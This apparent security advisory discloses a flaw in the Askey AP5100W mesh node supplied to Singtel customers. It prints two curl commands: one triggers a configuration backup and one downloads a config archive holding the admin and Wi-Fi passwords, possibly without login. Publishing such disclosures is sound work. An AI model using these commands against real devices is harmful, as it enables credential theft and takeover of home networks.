Askey AP5100W was a wifi mesh node provided to Singtel customers as part of their Fibre Broadband contract package. It is used to provide greater WiFi coverage in homes or offices.
The wifi mesh node comes with a configurable web interface that allows users to modify settings on their mesh nodes and run diagnostics.
The default login credential of the web interface for the Askey AP5100W is as follows:
Upon successful authentication, an attacker can send the following command to create a configuration backup using the following command
curl 'http://IP_ADDR_OF_WEB_INTERFACE/status.cgi?_=1590135633550&service=cfgbackup&act=nvset' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'X-Requested-With: XMLHttpRequest' -H 'DNT: 1' -H 'Connection: keep-alive'
If successful, the response is as follows:
{"nvset":"ok"}
Then the attacker would be able to obtain the configuration file (contains admin login password, wifi password and etc) through
curl http://IP_ADDR_OF_WEB_INTERFACE/configs/config.tar
In the worst case scenario, regardless of the login status. Meaning if an admin has backed up the configuration file, the attacker is still able to obtain the admin login password even without authentication.
The vendor didn’t replied to us despite all the efforts we made.